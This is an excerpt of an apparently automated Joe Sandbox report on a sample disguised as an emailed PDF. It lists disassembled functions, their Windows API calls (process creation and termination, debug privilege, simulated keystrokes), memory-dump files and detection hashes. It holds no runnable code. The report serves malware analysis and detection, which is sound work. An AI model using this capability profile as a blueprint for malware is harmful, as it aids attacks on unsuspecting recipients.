                                                                                                          • Opcode ID: 68d83abd078a0e68f80bd4c6572564dfba528f0bcfdae8af7ef678ce0c25f768
                                                                                                          • Instruction ID: a547edca6889e14f97b5cc010311e7c79c0f76b3ba41de33a16764331ffddc7a
                                                                                                          • Opcode Fuzzy Hash: 68d83abd078a0e68f80bd4c6572564dfba528f0bcfdae8af7ef678ce0c25f768
                                                                                                          • Instruction Fuzzy Hash: 4E416FB1501618BFEB119F60CC89FFE7BACEF09354F44812EF9059A142E7789E449BA4
                                                                                                          Function 007C8C46 Relevance: 13.9, APIs: 9, Instructions: 438COMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • GetModuleFileNameW.KERNEL32(?,?,00000104,?,007DF910), ref: 007C8D28
                                                                                                          • FreeLibrary.KERNEL32(00000000,00000001,00000000,?,007DF910), ref: 007C8D5C
                                                                                                          • QueryPathOfRegTypeLib.OLEAUT32(?,?,?,?,?), ref: 007C8ED6
                                                                                                          • SysFreeString.OLEAUT32(?), ref: 007C8F00
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2101307476.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2101258607.0000000000750000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2101351603.00000000007DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2101351603.0000000000804000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2101406054.000000000080E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2101460697.0000000000817000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_750000_PK241200518-EMAIL RELEASE-pdf.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Free$FileLibraryModuleNamePathQueryStringType
                                                                                                          • String ID:
                                                                                                          • API String ID: 560350794-0
                                                                                                          • Opcode ID: e1db8fb759fa8e56013c341655f455ae468c037e60c37c45aad89806f88f81d0
                                                                                                          • Instruction ID: 8155ba4838b4ec91fe8d77c6876870a607c5bcf948b40cd62ad6ed97f1719310
                                                                                                          • Opcode Fuzzy Hash: e1db8fb759fa8e56013c341655f455ae468c037e60c37c45aad89806f88f81d0
                                                                                                          • Instruction Fuzzy Hash: ECF12871A00209EFCB54DF94C888EAEB7B9FF49315F10849CF906AB251DB35AE45CB61
                                                                                                          Function 007CF694 Relevance: 13.9, APIs: 9, Instructions: 386processCOMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • _memset.LIBCMT ref: 007CF6B5
                                                                                                          • GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 007CF848
                                                                                                          • GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 007CF86C
                                                                                                          • GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 007CF8AC
                                                                                                          • GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 007CF8CE
                                                                                                          • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,?,?,00000000,?,?,?), ref: 007CFA4A
                                                                                                          • GetLastError.KERNEL32(00000000,00000001,00000000), ref: 007CFA7C
                                                                                                          • CloseHandle.KERNEL32(?), ref: 007CFAAB
                                                                                                          • CloseHandle.KERNEL32(?), ref: 007CFB22
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2101307476.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2101258607.0000000000750000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2101351603.00000000007DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2101351603.0000000000804000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2101406054.000000000080E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2101460697.0000000000817000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_750000_PK241200518-EMAIL RELEASE-pdf.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Directory$CloseCurrentHandleSystem$CreateErrorLastProcess_memset
                                                                                                          • String ID:
                                                                                                          • API String ID: 4090791747-0
                                                                                                          • Opcode ID: b73569640ed33fa6d9f43ab0adfc513dc024400cad3d2d9c9c74e7c561758287
                                                                                                          • Instruction ID: d59d86a85c3daf9712b9959ebb0ec57a19a678ec25fe0905a07884f08aec7174
                                                                                                          • Opcode Fuzzy Hash: b73569640ed33fa6d9f43ab0adfc513dc024400cad3d2d9c9c74e7c561758287
                                                                                                          • Instruction Fuzzy Hash: 13E1C171604300DFCB14EF24C885F6ABBE1AF85350F14856DF9999B2A2CB78EC45CB52
                                                                                                          Function 007B4CC1 Relevance: 13.7, APIs: 9, Instructions: 170filestringCOMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                            • Part of subcall function 007B466E: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,007B3697,?), ref: 007B468B
                                                                                                            • Part of subcall function 007B466E: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,?,007B3697,?), ref: 007B46A4
                                                                                                            • Part of subcall function 007B4A31: GetFileAttributesW.KERNEL32(?,007B370B), ref: 007B4A32
                                                                                                          • lstrcmpiW.KERNEL32(?,?), ref: 007B4D40
                                                                                                          • _wcscmp.LIBCMT ref: 007B4D5A
                                                                                                          • MoveFileW.KERNEL32(?,?), ref: 007B4D75
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2101307476.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2101258607.0000000000750000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2101351603.00000000007DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2101351603.0000000000804000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2101406054.000000000080E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2101460697.0000000000817000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_750000_PK241200518-EMAIL RELEASE-pdf.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: FileFullNamePath$AttributesMove_wcscmplstrcmpi
                                                                                                          • String ID:
                                                                                                          • API String ID: 793581249-0
                                                                                                          • Opcode ID: 23a276bc2a1e6e937f31a8eadb6ae6df39f89bf0be19c7223790f79c4de05be2
                                                                                                          • Instruction ID: 2f3b446be813357e4a6f055d4d906320f9cd15d71918bd96b3da2ab4d971ff19
                                                                                                          • Opcode Fuzzy Hash: 23a276bc2a1e6e937f31a8eadb6ae6df39f89bf0be19c7223790f79c4de05be2
                                                                                                          • Instruction Fuzzy Hash: D25177B2108385DBC724DB60D895ADFB3ECAF84351F00492EF689D3152EF78A588C756
                                                                                                          Function 007D8645 Relevance: 13.7, APIs: 9, Instructions: 168COMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • InvalidateRect.USER32(?,00000000,00000001,?,00000001), ref: 007D86FF
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2101307476.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2101258607.0000000000750000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2101351603.00000000007DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2101351603.0000000000804000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2101406054.000000000080E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2101460697.0000000000817000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_750000_PK241200518-EMAIL RELEASE-pdf.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: InvalidateRect
                                                                                                          • String ID:
                                                                                                          • API String ID: 634782764-0
                                                                                                          • Opcode ID: 20338c79bf46d311fdbd3d76963fb3f3deec65e69fb533b0c6230f5754831090
                                                                                                          • Instruction ID: 60e1dc41fcac95f9549743ecc5472c5379315dd2952bd767c24cc991c4e85b49
                                                                                                          • Opcode Fuzzy Hash: 20338c79bf46d311fdbd3d76963fb3f3deec65e69fb533b0c6230f5754831090
                                                                                                          • Instruction Fuzzy Hash: 4D518030610244FEDBA09B68CC89FA97B75BB05720F604157F911E63A1CB79E980DB52
                                                                                                          Function 00752B72 Relevance: 13.7, APIs: 9, Instructions: 161windowCOMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • LoadImageW.USER32(00000000,?,00000001,00000010,00000010,00000010), ref: 0078C2F7
                                                                                                          • ExtractIconExW.SHELL32(?,00000000,00000000,00000000,00000001), ref: 0078C319
                                                                                                          • LoadImageW.USER32(00000000,?,00000001,00000000,00000000,00000050), ref: 0078C331
                                                                                                          • ExtractIconExW.SHELL32(?,00000000,?,00000000,00000001), ref: 0078C34F
                                                                                                          • SendMessageW.USER32(00000000,00000080,00000000,00000000), ref: 0078C370
                                                                                                          • DestroyIcon.USER32(00000000), ref: 0078C37F
                                                                                                          • SendMessageW.USER32(00000000,00000080,00000001,00000000), ref: 0078C39C
                                                                                                          • DestroyIcon.USER32(?), ref: 0078C3AB
                                                                                                            • Part of subcall function 007DA4AF: DeleteObject.GDI32(00000000), ref: 007DA4E8
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2101307476.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2101258607.0000000000750000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2101351603.00000000007DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2101351603.0000000000804000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2101406054.000000000080E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2101460697.0000000000817000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_750000_PK241200518-EMAIL RELEASE-pdf.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Icon$DestroyExtractImageLoadMessageSend$DeleteObject
                                                                                                          • String ID:
                                                                                                          • API String ID: 2819616528-0
                                                                                                          • Opcode ID: 06edfa4877cd2246663cb0812302f1db3ae51b935f5f69796f8718103e314405
                                                                                                          • Instruction ID: c334d5c3de1058400765a8e7c8f7ceabe46e5a9cbade84e3a2bd174bba4c4650
                                                                                                          • Opcode Fuzzy Hash: 06edfa4877cd2246663cb0812302f1db3ae51b935f5f69796f8718103e314405
                                                                                                          • Instruction Fuzzy Hash: 51516970A40205EFDB20EF64CC45BAA3BB5FB49311F108529F902976A1D7B8ED96DB60
                                                                                                          Function 007A966E Relevance: 13.6, APIs: 9, Instructions: 66sleepkeyboardwindowCOMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                            • Part of subcall function 007AA82C: GetWindowThreadProcessId.USER32(?,00000000), ref: 007AA84C
                                                                                                            • Part of subcall function 007AA82C: GetCurrentThreadId.KERNEL32 ref: 007AA853
                                                                                                            • Part of subcall function 007AA82C: AttachThreadInput.USER32(00000000,?,007A9683,?,00000001), ref: 007AA85A
                                                                                                          • MapVirtualKeyW.USER32(00000025,00000000), ref: 007A968E
                                                                                                          • PostMessageW.USER32(?,00000100,00000025,00000000), ref: 007A96AB
                                                                                                          • Sleep.KERNEL32(00000000,?,00000100,00000025,00000000,?,00000001), ref: 007A96AE
                                                                                                          • MapVirtualKeyW.USER32(00000025,00000000), ref: 007A96B7
                                                                                                          • PostMessageW.USER32(?,00000100,00000027,00000000), ref: 007A96D5
                                                                                                          • Sleep.KERNEL32(00000000,?,00000100,00000027,00000000,?,00000001), ref: 007A96D8
                                                                                                          • MapVirtualKeyW.USER32(00000025,00000000), ref: 007A96E1
                                                                                                          • PostMessageW.USER32(?,00000101,00000027,00000000), ref: 007A96F8
                                                                                                          • Sleep.KERNEL32(00000000,?,00000100,00000027,00000000,?,00000001), ref: 007A96FB
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2101307476.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2101258607.0000000000750000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2101351603.00000000007DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2101351603.0000000000804000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2101406054.000000000080E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2101460697.0000000000817000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_750000_PK241200518-EMAIL RELEASE-pdf.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: MessagePostSleepThreadVirtual$AttachCurrentInputProcessWindow
                                                                                                          • String ID:
                                                                                                          • API String ID: 2014098862-0
                                                                                                          • Opcode ID: d68c30593294ed8a8ac84ad6d975d9eefd0714951f36ff22f09e3bbbd26975a7
                                                                                                          • Instruction ID: f2d8793ee85d4a8e8fa86527534936da4557efc668e3a49ad42f6e8c4273c386
                                                                                                          • Opcode Fuzzy Hash: d68c30593294ed8a8ac84ad6d975d9eefd0714951f36ff22f09e3bbbd26975a7
                                                                                                          • Instruction Fuzzy Hash: 0611E1B1910218FEF6106F60DC89F6A3B2DEB4D750F104426F345AB0A0CAFB5C10DAA8
                                                                                                          Function 007A8921 Relevance: 13.5, APIs: 9, Instructions: 49memorythreadCOMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • GetProcessHeap.KERNEL32(00000008,0000000C,00000000,00000000,?,007A853C,00000B00,?,?), ref: 007A892A
                                                                                                          • HeapAlloc.KERNEL32(00000000,?,007A853C,00000B00,?,?), ref: 007A8931
                                                                                                          • GetCurrentProcess.KERNEL32(00000000,00000000,00000000,00000002,?,007A853C,00000B00,?,?), ref: 007A8946
                                                                                                          • GetCurrentProcess.KERNEL32(?,00000000,?,007A853C,00000B00,?,?), ref: 007A894E
                                                                                                          • DuplicateHandle.KERNEL32(00000000,?,007A853C,00000B00,?,?), ref: 007A8951
                                                                                                          • GetCurrentProcess.KERNEL32(00000008,00000000,00000000,00000002,?,007A853C,00000B00,?,?), ref: 007A8961
                                                                                                          • GetCurrentProcess.KERNEL32(007A853C,00000000,?,007A853C,00000B00,?,?), ref: 007A8969
                                                                                                          • DuplicateHandle.KERNEL32(00000000,?,007A853C,00000B00,?,?), ref: 007A896C
                                                                                                          • CreateThread.KERNEL32(00000000,00000000,007A8992,00000000,00000000,00000000), ref: 007A8986
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2101307476.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2101258607.0000000000750000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2101351603.00000000007DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2101351603.0000000000804000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2101406054.000000000080E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2101460697.0000000000817000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_750000_PK241200518-EMAIL RELEASE-pdf.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Process$Current$DuplicateHandleHeap$AllocCreateThread
                                                                                                          • String ID:
                                                                                                          • API String ID: 1957940570-0
                                                                                                          • Opcode ID: f5dc7b9eb525559268fa51461bc29918b036be52716d82aacb7fff4990ee1c10
                                                                                                          • Instruction ID: 96b43d41b6b7a66f2357d7cdfd344437e0e695db0ee80fa96f7fa6217d6bbbf8
                                                                                                          • Opcode Fuzzy Hash: f5dc7b9eb525559268fa51461bc29918b036be52716d82aacb7fff4990ee1c10
                                                                                                          • Instruction Fuzzy Hash: 6201BBB5241308FFE710ABA5DC4DF6B3BACEB89711F408421FA05DB1A1CA75AC00CB25
                                                                                                          Function 007C9B23 Relevance: 12.6, APIs: 5, Strings: 2, Instructions: 352COMMON
                                                                                                          Download Yara Rule
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2101307476.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2101258607.0000000000750000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2101351603.00000000007DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2101351603.0000000000804000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2101406054.000000000080E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2101460697.0000000000817000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_750000_PK241200518-EMAIL RELEASE-pdf.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID: NULL Pointer assignment$Not an Object type
                                                                                                          • API String ID: 0-572801152
                                                                                                          • Opcode ID: 119794b651674c3f539add1324a4c7a39c86cd3ea2b37ff697e808135e554e19
                                                                                                          • Instruction ID: b01fdd0843e60cf36fa254a780a13394958d5910ec69608bb851353313bc53b5
                                                                                                          • Opcode Fuzzy Hash: 119794b651674c3f539add1324a4c7a39c86cd3ea2b37ff697e808135e554e19
                                                                                                          • Instruction Fuzzy Hash: B2C19371A00219ABDF50CF68D888FAEB7F5FF58314F15846DEA05A7281E7749D41CBA0
                                                                                                          Function 007C975D Relevance: 12.5, APIs: 6, Strings: 1, Instructions: 242COMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                            • Part of subcall function 007A710A: CLSIDFromProgID.OLE32(?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,007A7044,80070057,?,?,?,007A7455), ref: 007A7127
                                                                                                            • Part of subcall function 007A710A: ProgIDFromCLSID.OLE32(?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,007A7044,80070057,?,?), ref: 007A7142
                                                                                                            • Part of subcall function 007A710A: lstrcmpiW.KERNEL32(?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,007A7044,80070057,?,?), ref: 007A7150
                                                                                                            • Part of subcall function 007A710A: CoTaskMemFree.OLE32(00000000,?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,007A7044,80070057,?), ref: 007A7160
                                                                                                          • CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000002,00000003,00000000,00000000,00000000,?,?,?), ref: 007C9806
                                                                                                          • _memset.LIBCMT ref: 007C9813
                                                                                                          • _memset.LIBCMT ref: 007C9956
                                                                                                          • CoCreateInstanceEx.OLE32(?,00000000,00000015,?,00000001,00000000), ref: 007C9982
                                                                                                          • CoTaskMemFree.OLE32(?), ref: 007C998D
                                                                                                          Strings
                                                                                                          • NULL Pointer assignment, xrefs: 007C99DB
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2101307476.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2101258607.0000000000750000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2101351603.00000000007DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2101351603.0000000000804000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2101406054.000000000080E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2101460697.0000000000817000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_750000_PK241200518-EMAIL RELEASE-pdf.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: FreeFromProgTask_memset$CreateInitializeInstanceSecuritylstrcmpi
                                                                                                          • String ID: NULL Pointer assignment
                                                                                                          • API String ID: 1300414916-2785691316
                                                                                                          • Opcode ID: adb557043e2c89fe82fce00945b277d278b3b6f9dbaca9fbb315aed81e995c35
                                                                                                          • Instruction ID: d893294444cf98b5b639e62d5d62856a9210d630010db16c49b9bab9486d70cb
                                                                                                          • Opcode Fuzzy Hash: adb557043e2c89fe82fce00945b277d278b3b6f9dbaca9fbb315aed81e995c35
                                                                                                          • Instruction Fuzzy Hash: 49914A71D00218EBDB10DFA5DC48EDEBBB9EF48310F20815AF519A7291DB75AA44CFA0
                                                                                                          Function 007B2A96 Relevance: 12.4, APIs: 4, Strings: 3, Instructions: 195windowCOMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                            • Part of subcall function 0076FC86: _wcscpy.LIBCMT ref: 0076FCA9
                                                                                                          • _memset.LIBCMT ref: 007B2B87
                                                                                                          • GetMenuItemInfoW.USER32(?,?,00000000,?), ref: 007B2BB6
                                                                                                          • SetMenuItemInfoW.USER32(?,?,00000000,?), ref: 007B2C69
                                                                                                          • SetMenuDefaultItem.USER32(?,000000FF,00000000), ref: 007B2C97
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2101307476.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2101258607.0000000000750000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2101351603.00000000007DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2101351603.0000000000804000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2101406054.000000000080E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2101460697.0000000000817000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_750000_PK241200518-EMAIL RELEASE-pdf.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: ItemMenu$Info$Default_memset_wcscpy
                                                                                                          • String ID: 0$8Z$8Z
                                                                                                          • API String ID: 4152858687-1504830169
                                                                                                          • Opcode ID: ce73ce74d4fce5f02cae695ed811426db57139718e82f8c657b56928f8a1eb22
                                                                                                          • Instruction ID: 12a5e67b3d7a84d959100ed7f3d8c0575eea8e42fa4f07e560c38bd3bcf46b1e
                                                                                                          • Opcode Fuzzy Hash: ce73ce74d4fce5f02cae695ed811426db57139718e82f8c657b56928f8a1eb22
                                                                                                          • Instruction Fuzzy Hash: BA51D37160A3009AD7249F24D845BEF7BE8EF89350F044A2DF895D31A2DB78CD4687A2
                                                                                                          Function 007D6D80 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 143windowCOMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • SendMessageW.USER32(00000000,00001036,00000010,00000010), ref: 007D6E24
                                                                                                          • SendMessageW.USER32(?,00001036,00000000,?), ref: 007D6E38
                                                                                                          • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000013), ref: 007D6E52
                                                                                                          • _wcscat.LIBCMT ref: 007D6EAD
                                                                                                          • SendMessageW.USER32(?,00001057,00000000,?), ref: 007D6EC4
                                                                                                          • SendMessageW.USER32(?,00001061,?,0000000F), ref: 007D6EF2
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2101307476.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2101258607.0000000000750000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2101351603.00000000007DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2101351603.0000000000804000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2101406054.000000000080E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2101460697.0000000000817000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_750000_PK241200518-EMAIL RELEASE-pdf.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: MessageSend$Window_wcscat
                                                                                                          • String ID: SysListView32
                                                                                                          • API String ID: 307300125-78025650
                                                                                                          • Opcode ID: 09d2413cf272ec3488873cc270f3f4e37cf2e7008c2e135028ff2d1487111f0d
                                                                                                          • Instruction ID: 8bb3e6b50166ac08cd6162ce54cb3827ae52500766b95eb9db2018f3ef6949c3
                                                                                                          • Opcode Fuzzy Hash: 09d2413cf272ec3488873cc270f3f4e37cf2e7008c2e135028ff2d1487111f0d
                                                                                                          • Instruction Fuzzy Hash: 9741A071A00348EFEF219F64CC89BEA77B9EF08350F10442AF595E7292D6799D848B60
                                                                                                          Function 007CE933 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 136COMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                            • Part of subcall function 007B3C55: CreateToolhelp32Snapshot.KERNEL32 ref: 007B3C7A
                                                                                                            • Part of subcall function 007B3C55: Process32FirstW.KERNEL32(00000000,?), ref: 007B3C88
                                                                                                            • Part of subcall function 007B3C55: CloseHandle.KERNEL32(00000000), ref: 007B3D52
                                                                                                          • OpenProcess.KERNEL32(00000001,00000000,?), ref: 007CE9A4
                                                                                                          • GetLastError.KERNEL32 ref: 007CE9B7
                                                                                                          • OpenProcess.KERNEL32(00000001,00000000,?), ref: 007CE9E6
                                                                                                          • TerminateProcess.KERNEL32(00000000,00000000), ref: 007CEA63
                                                                                                          • GetLastError.KERNEL32(00000000), ref: 007CEA6E
                                                                                                          • CloseHandle.KERNEL32(00000000), ref: 007CEAA3
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2101307476.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2101258607.0000000000750000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2101351603.00000000007DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2101351603.0000000000804000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2101406054.000000000080E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2101460697.0000000000817000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_750000_PK241200518-EMAIL RELEASE-pdf.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Process$CloseErrorHandleLastOpen$CreateFirstProcess32SnapshotTerminateToolhelp32
                                                                                                          • String ID: SeDebugPrivilege
                                                                                                          • API String ID: 2533919879-2896544425
                                                                                                          • Opcode ID: c25a9bc02de67f2ad40ed7bb29f462bde60f99d19a7e2a99a795ba723698825e
                                                                                                          • Instruction ID: 5d4aab92e17e1a04db5537e8e7cffa70a0361561390b62c836aac74ca912c1ea
                                                                                                          • Opcode Fuzzy Hash: c25a9bc02de67f2ad40ed7bb29f462bde60f99d19a7e2a99a795ba723698825e
                                                                                                          • Instruction Fuzzy Hash: E8418C71600201DFDB14EF24CC99F6EB7A5AF81314F18845DFA469B2D2CBB9A908CF95
                                                                                                          Function 007B2F94 Relevance: 12.3, APIs: 2, Strings: 5, Instructions: 82windowCOMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • LoadIconW.USER32(00000000,00007F03), ref: 007B3033
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2101307476.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2101258607.0000000000750000.00000002.00000001.01000000.00000003.sdmpDownload File
